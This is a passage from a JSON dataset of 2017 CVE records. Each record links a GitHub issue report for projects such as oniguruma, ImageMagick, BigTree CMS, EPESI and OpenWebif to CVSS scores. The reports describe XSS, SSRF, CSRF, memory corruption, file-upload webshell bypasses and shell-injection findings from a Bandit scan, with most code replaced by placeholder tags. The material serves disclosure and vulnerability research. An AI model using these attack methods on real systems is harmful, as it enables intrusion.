        "Repo_new": "kkos/oniguruma",
        "Issue_Created_At": "2017-05-23T16:04:18Z",
        "description": "Heap corruption in APITAG due to uninitialized local variable. The following non deterministic behavior can be triggered from the following code. With ASAN enabled, on NUMBERTAG bit platform, the crash reproduces within NUMBERTAG runs. ERRORTAG With some add on: ERRORTAG ERRORTAG ASAN report: ERRORTAG The probabilistic reproducer triggers a heap OOB write when the local variable APITAG vs in APITAG is not initialized, following the call as: APITAG > APITAG > APITAG resulting in the said crash. Note the calls to APITAG is currently necessary to trigger the crash.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9229",
        "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/59",
        "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/59",
        "Repo_new": "kkos/oniguruma",
        "Issue_Created_At": "2017-05-23T13:28:54Z",
        "description": "SIGSEGV in APITAG due to bad dereference. Test code: ERRORTAG ASAN output: ERRORTAG In APITAG CODETAG Later reg >dmax is used in pointer arithmetic at forward_search_range, resulting in a bad reference from APITAG CODETAG Bad dereference: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9249",
        "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/21",
        "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/21",
        "Repo_new": "s3131212/allendisk",
        "Issue_Created_At": "2017-05-09T09:28:07Z",
        "description": "XSS Vulnerability in FILETAG . How to reproduce NUMBERTAG Upload FILETAG to your disk. FILETAG APITAG NUMBERTAG Make FILETAG public NUMBERTAG Get the link to FILETAG , eg. URLTAG NUMBERTAG SS would be triggered once user visit the link above. APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-9250",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/1821",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/1821",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2017-05-13T02:26:02Z",
        "description": "Denial of Service: Null Pointer De reference. I've discovered a NULL pointer de reference condition within Jerryscript. If the bytes NUMBERTAG c NUMBERTAG e NUMBERTAG a NUMBERTAG are evaluated by jerry_eval a segmentation fault will occur resulting in a denial of service. It occurs within jmem_heap_free_block when block_p >size is de referenced. Proof FILETAG The call tree is as follows (generally NUMBERTAG jerry_eval NUMBERTAG ecma_op_eval_chars_buffer NUMBERTAG parser_parse_script NUMBERTAG parser_parse_source NUMBERTAG lexer_next_token (parses the source for strings and returns NUMBERTAG parser_parse_statements (throws a parsing error via parser_raise_error and returns to the parser_parse_source PARSER_CATCH statement NUMBERTAG parser_free_literals NUMBERTAG util_free_literal NUMBERTAG jmem_heap_free_block (SEGMENTATION FAULT)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9261",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/476",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/476",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-06T07:37:11Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: FILETAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9262",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/475",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/475",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-06T07:35:38Z",
        "description": "memory leak in APITAG on APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: FILETAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9288",
        "Issue_Url_old": "https://github.com/MindscapeHQ/raygun4wordpress/issues/16",
        "Issue_Url_new": "https://github.com/mindscapehq/raygun4wordpress/issues/16",
        "Repo_new": "mindscapehq/raygun4wordpress",
        "Issue_Created_At": "2017-02-07T09:28:22Z",
        "description": "A Reflected XSS Vulnerability in wordpress plugin APITAG NUMBERTAG Hello\uff1a I found a Reflected XSS Vulnerability in wordpress plugin APITAG NUMBERTAG which is developmented by your company, this plugin can be downloaded at wordpress plugin website \" URLTAG \". How can i send this vulnerability report to you to fix it. My Email is EMAILTAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9289",
        "Issue_Url_old": "https://github.com/bramkorsten/Note/issues/11",
        "Issue_Url_new": "https://github.com/bramkorsten/note/issues/11",
        "Repo_new": "bramkorsten/note",
        "Issue_Created_At": "2017-03-04T15:07:07Z",
        "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"edit\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9304",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/674",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/674",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2017-05-29T05:56:00Z",
        "description": "Stack overflow in APITAG Stack overflow in APITAG Tested on Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9307",
        "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/20",
        "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/20",
        "Repo_new": "s3131212/allendisk",
        "Issue_Created_At": "2017-05-09T08:58:30Z",
        "description": "SSRF Vulnerability in FILETAG . /remotedownload.php CODETAG Obviously, $_POST['file'] could be within intranet ip range, eg. FILETAG , thus exposing a great attack surface.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9331",
        "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/193",
        "Issue_Url_new": "https://github.com/telaxus/epesi/issues/193",
        "Repo_new": "Telaxus/EPESI",
        "Issue_Created_At": "2017-05-27T09:44:21Z",
        "description": "Stored Cross site Scripting in Agenda APITAG tested on commit NUMBERTAG d NUMBERTAG Hi, I found a stored cross site scripting vulnerability in Agenda component. And i also tested it on github develop version(commit NUMBERTAG d NUMBERTAG it is vulnerable too. The POC is show below. Version : EPESI version NUMBERTAG re NUMBERTAG and develop version 'commit NUMBERTAG d NUMBERTAG FILETAG Login APITAG >CRM APITAG APITAG APITAG Title and Description APITAG FILETAG Back to Home > In Agenda section, when put your mouse cursor over Title, the script code will be excuted. FILETAG E Mail: EMAILTAG Discovered by: Huawei Weiran Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-9333",
        "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/621",
        "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/621",
        "Repo_new": "e2openplugins/e2openplugin-openwebif",
        "Issue_Created_At": "2017-06-26T18:33:24Z",
        "description": "Bandit Output. As mentioned in another issue, this is the bandit's OWIF analysis report, I hope it helps you, I would appreciate if you would give me acknowledgement if you decide to fix those and sure this helps the vendors to upgrade to safer updated versions. Thank you Run started NUMBERTAG APITAG Test results: >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG return APITAG NUMBERTAG except Exception NUMBERTAG pass >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG class APITAG NUMBERTAG FN = PATHTAG NUMBERTAG def __init__(self, session): >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG BACKUP_PATH = \"/tmp NUMBERTAG BACKUP_FILENAME = APITAG >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG APITAG += \"%s \" % arg NUMBERTAG lines = popen(\"tar cvf %s %s\" % APITAG NUMBERTAG remove(checkfile) >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG check_tar = False NUMBERTAG lines = popen('tar tf %s' % APITAG NUMBERTAG for line in lines: >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG remove(bouquetfiles NUMBERTAG lines = popen('tar xvf %s C / exclude APITAG % APITAG NUMBERTAG APITAG >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG wadd = week NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = mktime( APITAG APITAG APITAG + wadd NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG mode = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG oport = None NUMBERTAG if APITAG PATHTAG NUMBERTAG data = open( PATHTAG APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG if APITAG PATHTAG NUMBERTAG data = open( PATHTAG APITAG NUMBERTAG for i in data: >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG import glob NUMBERTAG tmpfiles = APITAG PATHTAG .ipk NUMBERTAG ipks = [] >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG def APITAG request NUMBERTAG APITAG = PATHTAG NUMBERTAG if APITAG >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: PATHTAG NUMBERTAG APITAG NUMBERTAG lines = popen( PATHTAG list | gzip > %s' % APITAG NUMBERTAG APITAG Disposition:\", \"attachment;filename= %s \" % APITAG NUMBERTAG Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG out = popen(\"opkg list NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a partial executable path Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG out = popen(\"opkg list NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG out = popen(\"opkg list installed NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a partial executable path Severity: Low Confidence: High Location: PATHTAG NUMBERTAG out = popen(\"opkg list installed NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG map[package NUMBERTAG out = popen(\"opkg list upgradable NUMBERTAG for line in out: >> Issue: APITAG Starting a process with a partial executable path Severity: Low Confidence: High Location: PATHTAG NUMBERTAG map[package NUMBERTAG out = popen(\"opkg list upgradable NUMBERTAG for line in out: >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG import os NUMBERTAG FN = PATHTAG + filename NUMBERTAG fileh = os.open(FN, os. APITAG ) >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with the equivalent defusedxml package, or make sure APITAG is called. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG from os import path, listdir NUMBERTAG import APITAG NUMBERTAG from APITAG import _ >> Issue: [B NUMBERTAG blacklist] Use of possibly insecure function consider using safer APITAG Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG cnf = eval(path NUMBERTAG if APITAG == APITAG or APITAG == APITAG or APITAG == APITAG >> Issue: [B NUMBERTAG blacklist] Use of possibly insecure function consider using safer APITAG Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG data = APITAG or NUMBERTAG text = APITAG \"\")) >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with its defusedxml equivalent function or make sure APITAG is called Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG setupfile = file(setupfile, 'r NUMBERTAG setupdom = APITAG NUMBERTAG APITAG >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG nic = str(nic NUMBERTAG except NUMBERTAG pass >> Issue: APITAG Possible binding to all interfaces. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG if ip is None or len(ip NUMBERTAG return NUMBERTAG return APITAG % (ip NUMBERTAG ip NUMBERTAG ip NUMBERTAG ip NUMBERTAG Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG ipaddress = list(tmpaddress NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG from APITAG import about NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG imagever = APITAG NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG distro = APITAG APITAG all NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG imagebuild NUMBERTAG except NUMBERTAG just in case >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG imagever = APITAG NUMBERTAG except NUMBERTAG pass >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed dvb modules APITAG NUMBERTAG except: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed dvb proxy APITAG NUMBERTAG except: >> Issue: APITAG Starting a process with a shell: Seems safe, but may be changed in the future, consider rewriting without shell Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed kernel core default gos APITAG NUMBERTAG except: >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG driverdate = os.popen( PATHTAG NUMBERTAG list_installed kernel core default gos APITAG NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG filename = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG nextactivation = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with the equivalent defusedxml package, or make sure APITAG is called. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG try NUMBERTAG import APITAG NUMBERTAG psfile = file(vpsfile, 'r') >> Issue: [B NUMBERTAG blacklist] Using APITAG to parse untrusted XML data is known to be vulnerable to XML attacks. Replace APITAG with its defusedxml equivalent function or make sure APITAG is called Severity: Medium Confidence: High Location: PATHTAG NUMBERTAG psfile = file(vpsfile, 'r NUMBERTAG psdom = APITAG NUMBERTAG APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG returns APITAG if the image supports the function APITAG on without T NUMBERTAG f = open( PATHTAG \"r NUMBERTAG APITAG = APITAG >> Issue: APITAG Probable insecure usage of temp file/directory. Severity: Medium Confidence: Medium Location: PATHTAG NUMBERTAG write APITAG to file so that the box will power on ONCE skipping the HDMI CEC communication NUMBERTAG f = open( PATHTAG \"w NUMBERTAG APITAG >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG timeout = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG endtime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG endtime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG begintime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG endtime = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG mnow[\"sref\"] = APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG time NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG APITAG NUMBERTAG except Exception, e NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG return APITAG request NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG APITAG True NUMBERTAG except NUMBERTAG pass >> Issue: [B NUMBERTAG try_except_pass] Try, Except, Pass detected. Severity: Low Confidence: High Location: PATHTAG NUMBERTAG APITAG servicetype, port NUMBERTAG except NUMBERTAG pass >> Issue: APITAG Starting a process with a shell, possible injection detected, security issue. Severity: High Confidence: High Location: . APITAG NUMBERTAG print APITAG compile %s > %s\" % (src, dest NUMBERTAG if os.system(\"msgfmt '%s' o '%s'\" % (src, dest NUMBERTAG raise Exception, APITAG to compile: \" + src Code scanned: Total lines of code NUMBERTAG Total lines skipped ( nosec NUMBERTAG Run metrics: Total issues (by severity): Undefined NUMBERTAG Low NUMBERTAG Medium NUMBERTAG High NUMBERTAG Total issues (by confidence): Undefined NUMBERTAG Low NUMBERTAG Medium NUMBERTAG High NUMBERTAG Files skipped NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9333",
        "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/619",
        "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/619",
        "Repo_new": "e2openplugins/e2openplugin-openwebif",
        "Issue_Created_At": "2017-06-20T14:02:01Z",
        "description": "Remote code execution via APITAG improper input validation.. It was discovered that the APITAG class, specifically APITAG defined in PATHTAG does not restrict or incorrectly restricts the input package name before its included as param of PATHTAG package manager binary. A remote attacker could possibly use this flaw to pass a URL as package name parameter by a HTTP request to an attacker controlled repository since there is no signature verification.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9364",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/280",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/280",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-05-16T09:27:52Z",
        "description": "Security hole for upload file bypass. ' Exploit Title: File Upload Bypass ' Vulnerability Type: Accessing, Modifying or Executing Executable Files (CAPEC NUMBERTAG Reporting Date NUMBERTAG Author: MENTIONTAG ' Vendor Homepage: FILETAG ' Software Link: URLTAG ' Version NUMBERTAG I. Abstract APITAG CMS is publicly licensed under the GNU Lesser General Public License It is an open source content management system built on PHP and APITAG II. Introduction NUMBERTAG Accessing, Modifying or Executing Executable Files An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface NUMBERTAG ulnerability analysis for bigtree cms At the file PATHTAG line NUMBERTAG ar APITAG = APITAG The code of Regular expression shows that i could be bypassed by upload a file sometime, the lamp environment install on ubuntu and debian with apt get can Resolved to pht and phtml\uff0cso wo can bypass to upload a file in URLTAG upload file Name xxx.pht or APITAG Then the attacker could get a webshell by using this method the webshell url \uff1a FILETAG NUMBERTAG Solution Use white lists instead of black lists thank you",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-9365",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/281",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/281",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-05-17T05:20:41Z",
        "description": "CSRF exists in APITAG CMS Less than NUMBERTAG CSRF exists in APITAG CMS Less than NUMBERTAG with the force parameter to the PATHTAG For example: URLTAG A page with id NUMBERTAG can be unlocked. you my be use APITAG function. thank you !",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9366",
        "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/196",
        "Issue_Url_new": "https://github.com/telaxus/epesi/issues/196",
        "Repo_new": "Telaxus/EPESI",
        "Issue_Created_At": "2017-05-31T08:30:18Z",
        "description": "Stored Cross site Scripting in Tab APITAG tested on commit c1d NUMBERTAG a7). Hi, I found a stored cross site scripting vulnerability in the tab_name parameter. And I also test it on github latest develop version(commit c1d NUMBERTAG a7), it is vulnerable too. The POC is show below. Administrator Login APITAG APITAG APITAG Dashboard APITAG APITAG new Tab APITAG crafted lable APITAG FILETAG When other Administrator Login to the Dashboard, the script code will be executed. FILETAG E Mail: EMAILTAG Discovered by: Huawei Weiran Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2017-9378",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/282",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/282",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-05-17T05:41:21Z",
        "description": "design flaw in APITAG CMS Less than NUMBERTAG There is two design flaw in APITAG CMS Less than NUMBERTAG one. the administrator level user can delete another administrator level user, resulting in malicious delete. the current user can only delete users who have less privileges than him. two. the current user can delete himself Bypass system APITAG system is disabled by default\uff09. the current user may net delete himself. the Flawed code: PATHTAG APITAG PATHTAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9379",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/287",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/287",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2017-06-02T09:06:56Z",
        "description": "Multiple Security Issue of CSRF exists in APITAG CMS Less than NUMBERTAG Multiple Security Issue of CSRF exists in APITAG CMS Less than NUMBERTAG one with the clear parameter to the PATHTAG ERRORTAG FILETAG poc: ERRORTAG request FILETAG then you will clear ERRORTAG report tow with the from and to parameter to the PATHTAG ERRORTAG FILETAG poc: ERRORTAG request FILETAG then you will create one NUMBERTAG Redirect you my be use APITAG function. thank you !",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-9405",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/457",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/457",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-04-28T04:00:47Z",
